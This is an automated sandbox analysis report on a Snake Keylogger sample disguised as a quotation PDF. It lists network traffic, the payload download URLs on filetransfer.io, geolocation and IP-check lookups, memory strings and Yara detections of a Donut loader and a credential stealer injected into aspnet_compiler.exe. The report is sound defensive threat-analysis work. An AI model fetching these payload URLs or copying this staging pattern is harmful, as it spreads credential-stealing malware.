Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49942 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /data-package/zWkbOqX7/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /storage/download/BbYQU8RBGGG7 HTTP/1.1Host: s24.filetransfer.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /data-package/zWkbOqX7/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: filetransfer.io
Source: global traffic	DNS traffic detected: DNS query: s24.filetransfer.io
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org

Source: aspnet_compiler.exe, 00000004.00000002.3368058853.00000258955F8000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3368058853.000002589561E000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3368058853.000002589560B000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3368058853.0000025895632000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3368058853.0000025895667000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3368058853.0000025895553000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: aspnet_compiler.exe, 00000004.00000002.3368058853.0000025895553000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: aspnet_compiler.exe, 00000004.00000002.3368058853.0000025895441000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: aspnet_compiler.exe, 00000004.00000002.3367707682.0000025893A30000.00000004.08000000.00040000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3371390790.00000258A5449000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: aspnet_compiler.exe, 00000004.00000002.3372089325.00000258ADCF0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA32C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://entityframework-plus.net/
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA32C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://filetransfer.io
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA32C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://filetransfer.io/data-package/zWkbOqX7/download
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2631206898.0000021FBBAFF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://microsoft.co
Source: aspnet_compiler.exe, 00000004.00000002.3368058853.00000258955F8000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3368058853.000002589561E000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3368058853.0000025895573000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3368058853.000002589560B000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3368058853.0000025895632000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3368058853.0000025895667000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA32C1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3368058853.0000025895441000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2631206898.0000021FBBAFF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.c)$
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	String found in binary or memory: http://www.zzzprojects.com
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA32C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bulk-operations.net
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	String found in binary or memory: https://bulk-operations.net/pricing.
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA32C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dapper-plus.net
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA32C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dapper-plus.net/getting-started-mapping#instance-context-mapping
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA32C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dapper-plus.net/getting-started-mapping#instance-context-mapping.
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	String found in binary or memory: https://dapper-plus.net/pricing.
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA32C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://entityframework-extensions.net/)
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA32C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://entityframework-extensions.net/include-graph).
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA32C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://entityframework-extensions.net/md5-exception
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	String found in binary or memory: https://entityframework-extensions.net/pricing.
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA3394000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://filetransfer.io
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA3561000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA3394000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://filetransfer.io/data-package/zWkbOqX7/download
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2629438942.0000021FB35FE000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2629438942.0000021FB33CF000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2632586012.0000021FBBF20000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2629438942.0000021FB35FE000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2629438942.0000021FB33CF000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2632586012.0000021FBBF20000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2629438942.0000021FB35FE000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2629438942.0000021FB33CF000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2632586012.0000021FBBF20000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA32C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/npgsql/npgsql/issues/2623#issuecomment-627622215
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	String found in binary or memory: https://linqtosql-plus.net/pricing.
Source: aspnet_compiler.exe, 00000004.00000002.3368058853.00000258955F8000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3368058853.000002589561E000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3368058853.000002589560B000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3368058853.0000025895632000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3368058853.00000258955A1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3368058853.0000025895667000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3368058853.0000025895553000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: aspnet_compiler.exe, 00000004.00000002.3367707682.0000025893A30000.00000004.08000000.00040000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3371390790.00000258A5449000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3368058853.0000025895553000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: aspnet_compiler.exe, 00000004.00000002.3368058853.0000025895553000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.187
Source: aspnet_compiler.exe, 00000004.00000002.3368058853.0000025895667000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3368058853.0000025895553000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.187p
Source: aspnet_compiler.exe, 00000004.00000002.3368058853.0000025895667000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.orgp
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA33C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://s24.filetransfer.io
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA33C2000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA33C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://s24.filetransfer.io/storage/download/BbYQU8RBGGG7
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2629438942.0000021FB35FE000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2629438942.0000021FB33CF000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2632586012.0000021FBBF20000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA348E000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2629438942.0000021FB35FE000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2629438942.0000021FB33CF000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2632586012.0000021FBBF20000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2629438942.0000021FB35FE000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2629438942.0000021FB33CF000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2632586012.0000021FBBF20000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA32C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.nuget.org/packages/NetTopologySuite.IO.SqlServerBytes/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49942
Source: unknown	Network traffic detected: HTTP traffic on port 49950 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49950
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49970 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49970
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown	Network traffic detected: HTTP traffic on port 49989 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49987 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49980 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49993 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49987

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49706 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 4.2.aspnet_compiler.exe.25893a30000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.aspnet_compiler.exe.25893a30000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.aspnet_compiler.exe.25893a30000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 4.2.aspnet_compiler.exe.25893a30000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 4.2.aspnet_compiler.exe.25893a30000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.aspnet_compiler.exe.25893a30000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.aspnet_compiler.exe.25893a30000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 4.2.aspnet_compiler.exe.25893a30000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 4.2.aspnet_compiler.exe.258a54500e8.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.aspnet_compiler.exe.258a54500e8.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.aspnet_compiler.exe.258a54500e8.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 4.2.aspnet_compiler.exe.258a54500e8.1.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 4.2.aspnet_compiler.exe.258a54500e8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.aspnet_compiler.exe.258a54500e8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.aspnet_compiler.exe.258a54500e8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 4.2.aspnet_compiler.exe.258a54500e8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.QUOTATION_NOVQTRA071244#U00faPDF.scr.exe.21fb33cf5f8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000004.00000002.3366738484.00000258936F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000004.00000002.3367707682.0000025893A30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000004.00000002.3367707682.0000025893A30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000004.00000002.3367707682.0000025893A30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000004.00000002.3367707682.0000025893A30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000000.00000002.2622093932.0000021FA370A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000004.00000002.3371390790.00000258A5449000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000004.00000002.3371390790.00000258A5449000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000000.00000002.2629438942.0000021FB33CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: Process Memory Space: aspnet_compiler.exe PID: 2928, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: aspnet_compiler.exe PID: 2928, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Code function: 0_2_00007FF848E63220	0_2_00007FF848E63220
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Code function: 0_2_00007FF848E61B68	0_2_00007FF848E61B68
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Code function: 0_2_00007FF848E62073	0_2_00007FF848E62073
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Code function: 0_2_00007FF848E6BCFB	0_2_00007FF848E6BCFB
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Code function: 0_2_00007FF84900307C	0_2_00007FF84900307C
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Code function: 0_2_00007FF849082328	0_2_00007FF849082328
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Code function: 0_2_00007FF8490888A0	0_2_00007FF8490888A0
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Code function: 0_2_00007FF849080188	0_2_00007FF849080188
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Code function: 0_2_00007FF849089978	0_2_00007FF849089978
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_000002589371279C	4_2_000002589371279C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0000025893712B78	4_2_0000025893712B78
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0000025893716254	4_2_0000025893716254
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00000258937118C0	4_2_00000258937118C0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0000025893712FA8	4_2_0000025893712FA8
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0000025893713A5C	4_2_0000025893713A5C

Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe

Static PE information: No import functions for PE file found

Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2629438942.0000021FB337F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs QUOTATION_NOVQTRA071244#U00faPDF.scr.exe
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2632987670.0000021FBC1A0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs QUOTATION_NOVQTRA071244#U00faPDF.scr.exe
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA3639000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs QUOTATION_NOVQTRA071244#U00faPDF.scr.exe
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2631878038.0000021FBBD10000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameXczekvkuftn.dll" vs QUOTATION_NOVQTRA071244#U00faPDF.scr.exe
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2629438942.0000021FB35FE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs QUOTATION_NOVQTRA071244#U00faPDF.scr.exe
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2629438942.0000021FB33CF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs QUOTATION_NOVQTRA071244#U00faPDF.scr.exe
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2629438942.0000021FB33CF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs QUOTATION_NOVQTRA071244#U00faPDF.scr.exe
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000000.2115283235.0000021FA1592000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameRvnuqxh.exeH vs QUOTATION_NOVQTRA071244#U00faPDF.scr.exe
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2632586012.0000021FBBF20000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs QUOTATION_NOVQTRA071244#U00faPDF.scr.exe
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Binary or memory string: OriginalFilenameRvnuqxh.exeH vs QUOTATION_NOVQTRA071244#U00faPDF.scr.exe

Source: 4.2.aspnet_compiler.exe.25893a30000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.aspnet_compiler.exe.25893a30000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.aspnet_compiler.exe.25893a30000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 4.2.aspnet_compiler.exe.25893a30000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
